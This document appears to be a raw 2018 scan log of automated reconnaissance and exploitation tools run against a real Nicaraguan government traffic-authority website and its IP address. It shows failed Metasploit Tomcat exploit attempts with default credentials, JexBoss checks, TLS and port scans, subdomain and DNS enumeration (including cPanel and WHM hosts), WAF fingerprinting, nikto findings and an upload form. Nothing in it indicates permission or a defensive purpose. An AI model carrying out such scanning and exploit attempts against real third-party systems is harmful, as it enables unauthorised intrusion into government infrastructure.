- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- RPORT => 8080
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] Attempting to connect to 50.87.39.91:8080
- [+] No File(s) found
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] http://50.87.39.91:8080/admin/j_security_check - Checking j_security_check...
- [*] http://50.87.39.91:8080/admin/j_security_check - Server returned: 404
- [-] http://50.87.39.91:8080/admin/j_security_check - Unable to enumerate users with this URI
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [-] http://50.87.39.91:8080 - Authorization not requested
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [-] Exploit aborted due to failure: not-found: The target server fingerprint "nginx/1.14.0" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
- [*] Exploit completed, but no session was created.
- USERNAME => tomcat
- PASSWORD => tomcat
- [-] Exploit aborted due to failure: not-found: The target server fingerprint "nginx/1.14.0" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
- [*] Exploit completed, but no session was created.
- #######################################################################################################################################
- * --- JexBoss: Jboss verify and EXploitation Tool --- *
- | * And others Java Deserialization Vulnerabilities * |
- | |
- | @author: João Filho Matos Figueiredo |
- | @contact: joaomatosf@gmail.com |
- | |
- | @update: https://github.com/joaomatosf/jexboss |
- #______________________________________________________#
- @version: 1.2.4
- * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
- ** Checking Host: http://transitonacional.gob.ni:8080 **
- [*] Checking admin-console: [ REDIRECT ]
- * The server sent a redirect to: http://www.transitonacional.gob.ni/admin-console/
- [*] Checking Struts2: [ OK ]
- [*] Checking Servlet Deserialization: [ OK ]
- [*] Checking Application Deserialization: [ OK ]
- [*] Checking Jenkins: [ OK ]
- [*] Checking web-console: [ OK ]
- [*] Checking jmx-console: [ OK ]
- [*] Checking JMXInvokerServlet: [ OK ]
- * Results:
- The server is not vulnerable to bugs tested ... :D
- * Info: review, suggestions, updates, etc:
- https://github.com/joaomatosf/jexboss
- * DONATE: Please consider making a donation to help improve this tool,
- * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
- + -- --=[Port 8180 closed... skipping.
- + -- --=[Port 8443 opened... running tests...
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://transitonacional.gob.ni:8443
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 14
- http://transitonacional.gob.ni:8443 [400 Bad Request] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[50.87.39.91], Title[400 The plain HTTP request was sent to HTTPS port], nginx[1.14.0]
- Version: 1.11.11-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 50.87.39.91
- Testing SSL server transitonacional.gob.ni on port 8443 using SNI name transitonacional.gob.ni
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits AES128-SHA
- Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits AES128-SHA
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 4096
- Subject: *.rhostbh.com
- Altnames: DNS:*.rhostbh.com, DNS:rhostbh.com
- Issuer: COMODO RSA Domain Validation Secure Server CA
- Not valid before: Feb 9 00:00:00 2016 GMT
- Not valid after: Feb 8 23:59:59 2019 GMT
- AVAILABLE PLUGINS
- -----------------
- PluginCertInfo
- PluginHeartbleed
- PluginSessionRenegotiation
- PluginSessionResumption
- PluginCompression
- PluginOpenSSLCipherSuites
- PluginHSTS
- PluginChromeSha1Deprecation
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- transitonacional.gob.ni:8443 => 50.87.39.91:8443
- SCAN RESULTS FOR TRANSITONACIONAL.GOB.NI:8443 - 50.87.39.91:8443
- ----------------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: 2d9ccc86afb7bba2a486e3d1dd7816596ebd3365
- Common Name: *.rhostbh.com
- Issuer: COMODO RSA Domain Validation Secure Server CA
- Serial Number: 8DB1D4FBDB8DE1FC9A9AA0BEBEB4BADC
- Not Before: Feb 9 00:00:00 2016 GMT
- Not After: Feb 8 23:59:59 2019 GMT
- Signature Algorithm: sha256WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 4096 bit
- Exponent: 65537 (0x10001)
- X509v3 Subject Alternative Name: {'DNS': ['*.rhostbh.com', 'rhostbh.com']}
- * Certificate - Trust:
- Hostname Validation: FAILED - Certificate does NOT match transitonacional.gob.ni
- Google CA Store (09/2015): OK - Certificate is trusted
- Java 6 CA Store (Update 65): OK - Certificate is trusted
- Microsoft CA Store (09/2015): OK - Certificate is trusted
- Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
- Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
- Certificate Chain Received: ['*.rhostbh.com', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * SSLV2 Cipher Suites:
- Undefined - An unexpected error happened:
- EXP-RC4-MD5 timeout - timed out
- EXP-RC2-CBC-MD5 timeout - timed out
- DES-CBC-MD5 timeout - timed out
- * Session Resumption:
- With Session IDs: ERROR (0 successful, 0 failed, 5 errors, 5 total attempts).
- ERROR #1: timeout - timed out
- ERROR #2: timeout - timed out
- ERROR #3: timeout - timed out
- ERROR #4: timeout - timed out
- ERROR #5: timeout - timed out
- With TLS Session Tickets: ERROR: timeout - timed out
- * SSLV3 Cipher Suites:
- Undefined - An unexpected error happened:
- SRP-RSA-3DES-EDE-CBC-SHA timeout - timed out
- SRP-DSS-3DES-EDE-CBC-SHA timeout - timed out
- SRP-3DES-EDE-CBC-SHA timeout - timed out
- SEED-SHA timeout - timed out
- RC4-SHA timeout - timed out
- RC4-MD5 timeout - timed out
- PSK-RC4-SHA timeout - timed out
- PSK-AES128-CBC-SHA timeout - timed out
- PSK-3DES-EDE-CBC-SHA timeout - timed out
- NULL-SHA256 timeout - timed out
- NULL-SHA timeout - timed out
- NULL-MD5 timeout - timed out
- IDEA-CBC-SHA timeout - timed out
- EXP-RC4-MD5 timeout - timed out
- EXP-RC2-CBC-MD5 timeout - timed out
- EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
- EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
- EXP-DES-CBC-SHA timeout - timed out
- EXP-ADH-RC4-MD5 timeout - timed out
- EXP-ADH-DES-CBC-SHA timeout - timed out
- EDH-RSA-DES-CBC3-SHA timeout - timed out
- EDH-RSA-DES-CBC-SHA timeout - timed out
- EDH-DSS-DES-CBC3-SHA timeout - timed out
- EDH-DSS-DES-CBC-SHA timeout - timed out
- ECDHE-RSA-RC4-SHA timeout - timed out
- ECDHE-RSA-NULL-SHA timeout - timed out
- ECDHE-RSA-DES-CBC3-SHA timeout - timed out
- ECDHE-ECDSA-RC4-SHA timeout - timed out
- ECDHE-ECDSA-NULL-SHA timeout - timed out
- ECDHE-ECDSA-DES-CBC3-SHA timeout - timed out
- ECDH-RSA-RC4-SHA timeout - timed out
- ECDH-RSA-NULL-SHA timeout - timed out
- ECDH-RSA-DES-CBC3-SHA timeout - timed out
- ECDH-RSA-AES128-SHA256 timeout - timed out
- ECDH-RSA-AES128-SHA timeout - timed out
- ECDH-RSA-AES128-GCM-SHA256 timeout - timed out
- ECDH-ECDSA-RC4-SHA timeout - timed out
- ECDH-ECDSA-NULL-SHA timeout - timed out
- ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
- ECDH-ECDSA-AES128-SHA256 timeout - timed out
- ECDH-ECDSA-AES128-SHA timeout - timed out
- ECDH-ECDSA-AES128-GCM-SHA256 timeout - timed out
- DH-RSA-DES-CBC3-SHA timeout - timed out
- DH-RSA-DES-CBC-SHA timeout - timed out
- DH-DSS-DES-CBC3-SHA timeout - timed out
- DH-DSS-DES-CBC-SHA timeout - timed out
- DES-CBC3-SHA timeout - timed out
- DES-CBC-SHA timeout - timed out
- CAMELLIA128-SHA timeout - timed out
- AES128-SHA256 timeout - timed out
- AES128-SHA timeout - timed out
- AES128-GCM-SHA256 timeout - timed out
- AECDH-RC4-SHA timeout - timed out
- AECDH-NULL-SHA timeout - timed out
- AECDH-DES-CBC3-SHA timeout - timed out
- ADH-SEED-SHA timeout - timed out
- ADH-RC4-MD5 timeout - timed out
- ADH-DES-CBC3-SHA timeout - timed out
- ADH-DES-CBC-SHA timeout - timed out
- ADH-CAMELLIA128-SHA timeout - timed out
- SCAN COMPLETED IN 112.89 S
- --------------------------
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-08 10:33 EDT
- Nmap scan report for transitonacional.gob.ni (50.87.39.91)
- Host is up (0.023s latency).
- rDNS record for 50.87.39.91: 50-87-39-91.unifiedlayer.com
- PORT STATE SERVICE VERSION
- 8443/tcp filtered https-alt
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 ... 30
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 13.95 seconds
- #######################################################################################################################################
- * --- JexBoss: Jboss verify and EXploitation Tool --- *
- | * And others Java Deserialization Vulnerabilities * |
- | |
- | @author: João Filho Matos Figueiredo |
- | @contact: joaomatosf@gmail.com |
- | |
- | @update: https://github.com/joaomatosf/jexboss |
- #______________________________________________________#
- @version: 1.2.4
- * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
- ** Checking Host: https://transitonacional.gob.ni:8443 **
- [*] Checking admin-console: [ OK ]
- [*] Checking Struts2: [ OK ]
- [*] Checking Servlet Deserialization: [ OK ]
- [*] Checking Application Deserialization: [ OK ]
- [*] Checking Jenkins: [ OK ]
- [*] Checking web-console: [ OK ]
- [*] Checking jmx-console: [ OK ]
- [*] Checking JMXInvokerServlet: [ OK ]
- * Results:
- The server is not vulnerable to bugs tested ... :D
- * Info: review, suggestions, updates, etc:
- https://github.com/joaomatosf/jexboss
- * DONATE: Please consider making a donation to help improve this tool,
- * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
- #######################################################################################################################################
- I, [2018-08-08T10:33:30.257241 #29485] INFO -- : Initiating port scan
- I, [2018-08-08T19:48:21.693769 #29485] INFO -- : Using nmap scan output file logs/nmap_output_2018-08-08_10-33-30.xml
- I, [2018-08-08T19:48:21.694894 #29485] INFO -- : Discovered open port: 50.87.39.91:80
- I, [2018-08-08T19:48:23.961078 #29485] INFO -- : Discovered open port: 50.87.39.91:443
- I, [2018-08-08T19:48:27.940128 #29485] INFO -- : Discovered open port: 50.87.39.91:993
- I, [2018-08-08T19:48:32.730060 #29485] INFO -- : Discovered open port: 50.87.39.91:995
- I, [2018-08-08T19:48:37.761590 #29485] INFO -- : Discovered open port: 50.87.39.91:8080
- I, [2018-08-08T19:48:40.098698 #29485] INFO -- : <<<Enumerating vulnerable applications>>>
- --------------------------------------------------------
- <<<Yasuo discovered following vulnerable applications>>>
- --------------------------------------------------------
- +----------+--------------------+-------------------+----------+----------+
- | App Name | URL to Application | Potential Exploit | Username | Password |
- +----------+--------------------+-------------------+----------+----------+
- +----------+--------------------+-------------------+----------+----------+
- ######################################################################################################################################
- =======================================================================================================================================
- Emails 1
- Hosts 3
- DNS Records 6
- Subdomains 6
- Emails (1)
- =======================================================================================================================================
- info@transitonacional.gob.ni
- Hosts (3)
- ======================================================================================================================================
- 50.87.39.91
- 162.159.24.66
- 162.159.25.91
- DNS Records (6)
- =======================================================================================================================================
- transitonacional.gob.ni A 50.87.39.91
- transitonacional.gob.ni MX 50.87.39.91
- ns1.rhostbh.com NS 162.159.24.66
- ns2.rhostbh.com NS 162.159.25.91
- ns1.rhostbh.com SOA 162.159.24.66
- transitonacional.gob.ni TXT v=spf1 a mx ptr include:rhostbh.com ?all
- Subdomains (6)
- =======================================================================================================================================
- autodiscover.transitonacional.gob.ni 50.87.39.91
- ftp.transitonacional.gob.ni 50.87.39.91
- mail.transitonacional.gob.ni 50.87.39.91
- transitonacional.gob.ni 50.87.39.91
- webmail.transitonacional.gob.ni 50.87.39.91
- www.transitonacional.gob.ni 50.87.39.91
- Loadbalancing
- =======================================================================================================================================
- Checking for DNS-Loadbalancing:
- NOT FOUND
- Checking for HTTP-Loadbalancing [Server]:
- nginx/1.14.0
- NOT FOUND
- Checking for HTTP-Loadbalancing [Date]:
- 16:44:17, 16:44:19, 16:44:21, 16:44:23, 16:44:25, 16:44:27, 16:44:30, 16:44:32, 16:44:34, 16:44:36,
- 16:44:38, 16:44:41, 16:44:43, 16:44:45, 16:44:47, 16:44:49, 16:44:51, 16:44:54, 16:44:56, 16:44:58,
- 16:45:00, 16:45:02, 16:45:04, 16:45:07, 16:45:09, 16:45:11, 16:45:13, 16:45:15, 16:45:17, 16:45:20,
- 16:45:23, 16:45:25, 16:45:27, 16:45:29, 16:45:31, 16:45:33, 16:45:35, 16:45:37, 16:45:39, 16:45:41,
- 16:45:44, 16:45:46, 16:45:48, 16:45:50, 16:45:52, 16:45:54, 16:45:57, 16:45:59, 16:46:01, 16:46:03,
- NOT FOUND
- Checking for HTTP-Loadbalancing [Diff]:
- NOT FOUND
- Web Application Firewall
- =======================================================================================================================================
- The site is behind a ModSecurity (OWASP CRS)
- The site seems to be behind a WAF or some sort of security solution
- Reason: The server returned a different response code when a string trigged the blacklist.
- Normal response code is "404", while the response code to an attack is "406"
- Traceroute
- =======================================================================================================================================
- UDP
- 1 * *
- 2 * *
- 3 * *
- 4 * *
- 5 * *
- 6 * *
- 7 * *
- 8 * *
- 9 * *
- 10 * *
- 11 * *
- 12 * *
- 13 * *
- 14 * *
- 15 * *
- 16 * *
- 17 * *
- 18 * *
- 19 * *
- 20 * *
- 21 * *
- 22 * *
- 23 * *
- 24 * *
- 25 * *
- 26 * *
- 27 * *
- 28 * *
- 29 * *
- 30 * *
- ICMP ECHO
- 1 public-gw.vpngate.net (10.211.254.254)
- 2 ntt.setup (192.168.1.1)
- 3 153.153.239.251 (153.153.239.251)
- 4 153.153.239.209 (153.153.239.209)
- 5 118.23.46.73 (118.23.46.73)
- 6 180.8.119.129 (180.8.119.129)
- 7 153.149.219.49 (153.149.219.49)
- 8 153.149.219.146 (153.149.219.146)
- 9 ae-12.r02.osakjp02.jp.bb.gin.ntt.net (61.200.80.9)
- 10 ae-3.r24.osakjp02.jp.bb.gin.ntt.net (129.250.2.41)
- 11 ae-2.r22.snjsca04.us.bb.gin.ntt.net (129.250.2.118)
- 12 ae-40.r02.snjsca04.us.bb.gin.ntt.net (129.250.3.121)
- 13 ae-0.a01.snjsca04.us.bb.gin.ntt.net (129.250.3.163)
- 14 ae-0.endurance.snjsca04.us.bb.gin.ntt.net (129.250.195.138)
- 15 162-144-240-169.unifiedlayer.com (162.144.240.169)
- 16 162-144-240-111.unifiedlayer.com (162.144.240.111)
- 17 50-87-39-91.unifiedlayer.com (50.87.39.91)
- TCP SYN
- 1 50-87-39-91.unifiedlayer.com (50.87.39.91)
- Zone Transfer
- =======================================================================================================================================
- Resolving SOA Record
- SOA ns1.rhostbh.com 162.159.24.66
- Resolving NS Records
- NS ns2.rhostbh.com 162.159.25.91
- NS ns1.rhostbh.com 162.159.24.66
- Trying NS server 162.159.25.91
- No answer or RRset not for qname
- Trying NS server 162.159.24.66
- No answer or RRset not for qname
- Whatweb
- =======================================================================================================================================
- autodiscover.rhostbh.com/ [ Unassigned]
- HTTPServer[nginx/1.14.0]
- IP[50.87.39.91]
- RedirectLocation[autodiscover.rhostbh.com/]
- Title[301 Moved Permanently]
- nginx[1.14.0]
- HTTPServer[nginx/1.14.0]
- IP[50.87.39.91]
- Script
- Title[Bluehost.com]
- nginx[1.14.0]
- Email[info@transitonacional.gob.ni
- transitonacional@gmail.com]
- Facebook-Plugin[likebox]
- Frame
- Google-API[ajax/libs/jquery/1/jquery.min.js]
- Google-Analytics[Universal] [UA-53950533-1]
- HTML5
- HTTPServer[nginx/1.14.0]
- IP[50.87.39.91]
- JQuery[1.11.1
- 1.7.1]
- Modernizr
- PHP[5.2.17]
- Script[text/javascript]
- Title[Dirección de Seguridad de Transito]
- UncommonHeaders[link
- x-acc-exp
- x-proxy-cache]
- WordPress
- WordpressSuperCache
- X-Powered-By[PHP/5.2.17]
- YouTube
- nginx[1.14.0]
- HTTPServer[nginx/1.14.0]
- IP[50.87.39.91]
- PHP[5.2.17]
- RedirectLocation[www.transitonacional.gob.ni/]
- UncommonHeaders[x-acc-exp
- x-proxy-cache]
- X-Powered-By[PHP/5.2.17]
- nginx[1.14.0]
- HTTPServer[nginx/1.14.0]
- IP[50.87.39.91]
- Script
- Title[Bluehost.com]
- nginx[1.14.0]
- Email[info@transitonacional.gob.ni
- transitonacional@gmail.com]
- Facebook-Plugin[likebox]
- Frame
- Google-API[ajax/libs/jquery/1/jquery.min.js]
- Google-Analytics[Universal] [UA-53950533-1]
- HTML5
- HTTPServer[nginx/1.14.0]
- IP[50.87.39.91]
- JQuery[1.11.1
- 1.7.1]
- Modernizr
- PHP[5.2.17]
- Script[text/javascript]
- Title[Dirección de Seguridad de Transito]
- UncommonHeaders[wp-super-cache
- x-acc-exp
- x-proxy-cache]
- WordPress
- WordpressSuperCache
- X-Powered-By[PHP/5.2.17]
- YouTube
- nginx[1.14.0]
- Email[info@transitonacional.gob.ni
- transitonacional@gmail.com]
- Facebook-Plugin[likebox]
- Frame
- Google-API[ajax/libs/jquery/1/jquery.min.js]
- Google-Analytics[Universal] [UA-53950533-1]
- HTML5
- HTTPServer[nginx/1.14.0]
- IP[50.87.39.91]
- JQuery[1.11.1
- 1.7.1]
- Modernizr
- PHP[5.2.17]
- Script[text/javascript]
- Title[Dirección de Seguridad de Transito]
- UncommonHeaders[wp-super-cache
- x-acc-exp
- x-proxy-cache]
- WordPress
- WordpressSuperCache
- X-Powered-By[PHP/5.2.17]
- YouTube
- nginx[1.14.0]
- ######################################################################################################################################
- Ip Address Status Type Domain Name Server
- ---------- ------ ---- ----------- ------
- 50.87.39.91 200 alias ftp.transitonacional.gob.ni nginx/1.14.0
- 50.87.39.91 200 host transitonacional.gob.ni nginx/1.14.0
- 127.0.0.1 host localhost.transitonacional.gob.ni
- 50.87.39.91 200 alias mail.transitonacional.gob.ni nginx/1.14.0
- 50.87.39.91 200 host transitonacional.gob.ni nginx/1.14.0
- 50.87.39.91 200 host webmail.transitonacional.gob.ni nginx/1.14.0
- 50.87.39.91 alias www.transitonacional.gob.ni
- 50.87.39.91 host transitonacional.gob.ni
- #######################################################################################################################################
- [*] Performing General Enumeration of Domain: transitonacional.gob.ni
- [-] DNSSEC is not configured for transitonacional.gob.ni
- [*] SOA ns1.rhostbh.com 162.159.24.66
- [*] NS ns1.rhostbh.com 162.159.24.66
- [*] Bind Version for 162.159.24.66 Salt-master
- [*] NS ns2.rhostbh.com 162.159.25.91
- [*] Bind Version for 162.159.25.91 Salt-master
- [*] MX transitonacional.gob.ni 50.87.39.91
- [*] A transitonacional.gob.ni 50.87.39.91
- [*] TXT transitonacional.gob.ni v=spf1 a mx ptr include:rhostbh.com ?all
- [*] Enumerating SRV Records
- [-] No SRV Records Found for transitonacional.gob.ni
- [+] 0 Records Found
- #######################################################################################################################################
- [*] Processing domain transitonacional.gob.ni
- [+] Getting nameservers
- 162.159.24.66 - ns1.rhostbh.com
- 162.159.25.91 - ns2.rhostbh.com
- [-] Zone transfer failed
- [+] TXT records found
- "v=spf1 a mx ptr include:rhostbh.com ?all"
- [+] MX records found, added to target list
- 0 transitonacional.gob.ni.
- [*] Scanning transitonacional.gob.ni for A records
- 50.87.39.91 - transitonacional.gob.ni
- 50.87.39.91 - autoconfig.transitonacional.gob.ni
- 50.87.39.91 - autodiscover.transitonacional.gob.ni
- 50.87.39.91 - cpanel.transitonacional.gob.ni
- 50.87.39.91 - ftp.transitonacional.gob.ni
- 127.0.0.1 - localhost.transitonacional.gob.ni
- 50.87.39.91 - mail.transitonacional.gob.ni
- 50.87.39.91 - webdisk.transitonacional.gob.ni
- 50.87.39.91 - webmail.transitonacional.gob.ni
- 50.87.39.91 - whm.transitonacional.gob.ni
- 50.87.39.91 - www.transitonacional.gob.ni
- #######################################################################################################################################
- Target :~# transitonacional.gob.ni
- dnsmap 0.30 - DNS Network Mapper by pagvac (gnucitizen.org)
- [+] searching (sub)domains for transitonacional.gob.ni using built-in wordlist
- [+] using maximum random delay of 10 millisecond(s) between requests
- cpanel.transitonacional.gob.ni
- IP address #1: 50.87.39.91
- ftp.transitonacional.gob.ni
- IP address #1: 50.87.39.91
- localhost.transitonacional.gob.ni
- IP address #1: 127.0.0.1
- [+] warning: domain might be vulnerable to "same site" scripting (http://snipurl.com/etbcv)
- mail.transitonacional.gob.ni
- IP address #1: 50.87.39.91
- webmail.transitonacional.gob.ni
- IP address #1: 50.87.39.91
- www.transitonacional.gob.ni
- IP address #1: 50.87.39.91
- [+] 6 (sub)domains and 6 IP address(es) found
- [+] completion time: 2017 second(s)
- 【!】 Main Menu【!】
- #######################################################################################################################################
- --------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 50.87.39.91
- + Target Hostname: www.transitonacional.gob.ni
- + Target Port: 80
- + Start Time: 2018-08-08 10:06:33 (GMT-4)
- --------------------------------------------------------------------------------------------------------------------------------------
- + Server: nginx/1.14.0
- + Retrieved x-powered-by header: PHP/5.2.17
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + Uncommon header 'x-acc-exp' found, with contents: 3
- + Uncommon header 'x-proxy-cache' found, with contents: HIT www.transitonacional.gob.ni
- + Uncommon header 'wp-super-cache' found, with contents: Served supercache file from PHP
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Uncommon header 'link' found, with contents: <http://www.transitonacional.gob.ni/wp-json/>; rel="https://api.w.org/"
- + Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
- + Entry '/wp-admin/admin-ajax.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + "robots.txt" contains 2 entries which should be manually viewed.
- + ERROR: Error limit (20) reached for host, giving up. Last error:
- + Scan terminated: 4 error(s) and 11 item(s) reported on remote host
- + End Time: 2018-08-08 10:27:45 (GMT-4) (1272 seconds)
- ---------------------------------------------------------------------------------------------------------------------------------------
- #######################################################################################################################################
- =======================================================================================================================================
- | [*] http://transitonacional.gob.ni/ redirected to http://www.transitonacional.gob.ni/
- | [*] New target is: http://www.transitonacional.gob.ni/
- =======================================================================================================================================
- | Domain: http://www.transitonacional.gob.ni/
- | Server: nginx/1.14.0
- | IP: 50.87.39.91
- =======================================================================================================================================
- |
- | Directory check:
- | Skipped because http://www.transitonacional.gob.ni/uniscan566/ did not return the code 404
- =======================================================================================================================================
- |
- | File check:
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/favicon.ico
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/index.php
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/license.txt
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/mailman/listinfo
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/.plan
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/readme.html
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/robots.txt
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/search/htx/sqlqhit.asp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/search/htx/SQLQHit.asp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/search/SQLQHit.asp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/search/sqlqhit.asp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/_vti_pvt/service.pwd
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/_vti_pvt/services.org
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/_vti_pvt/users.pwd
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/_vti_pvt/svacl.cnf
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/w3perl/admin
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wbboard/reply.php
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wconnect/admin.html
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/_vti_pvt/writeto.cnf
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wa.exe
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wbboard/profile.php
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webaccess/access-options.txt
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/WebAdmin.dll?View=Logon
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webaccess.htm
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webadmin.asp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webadmin.html
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webadmin.nsf
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webadmin.php
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/WEBAGENT/CQMGSERV/CF-SINFO.TPF
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/WebCacheDemo.html
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webcache/webcache.xml
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webamil/test.php?mode=phpinfo
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/web_app/WEB-INF/webapp.properties
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webcalendar/login.php
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webcalendar/view_m.php
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webamil/test.php
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webcart/orders/import.txt
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webcart/config/clients.txt
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/web.config
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webcart-lite/orders/import.txt
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webdynpro/welcome/Welcome.jsp
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webcart-lite/config/import.txt
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webdav/index.html
- | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/WEB-INF/web.xml
- ======================================================================================================================================
- |
- | Check robots.txt:
- | [+] User-agent: *
- | [+] Disallow: /wp-admin/
- | [+] Allow: /wp-admin/admin-ajax.php
- |
- | Check sitemap.xml:
- =======================================================================================================================================
- #######################################################################################################################################
- | External hosts:
- | [+] External Host Found: http://flexslider.woothemes.com
- | [+] External Host Found: http://html5shim.googlecode.com
- | [+] External Host Found: http://php.net
- | [+] External Host Found: http://www.koidiseno.com
- | [+] External Host Found: http://code.jquery.com
- | [+] External Host Found: http://ajax.googleapis.com
- | [+] External Host Found: http://www.mysql.com
- | [+] External Host Found: https://wordpress.org
- | [+] External Host Found: https://codex.wordpress.org
- | [+] External Host Found: https://planet.wordpress.org
- | [+] External Host Found: http://httpd.apache.org
- |
- | PHPinfo() Disclosure:
- |
- | Web Backdoors:
- |
- | File Upload Forms:
- | [+] Upload Form Found: http://www.transitonacional.gob.ni/denuncias
- |
- | E-mails:
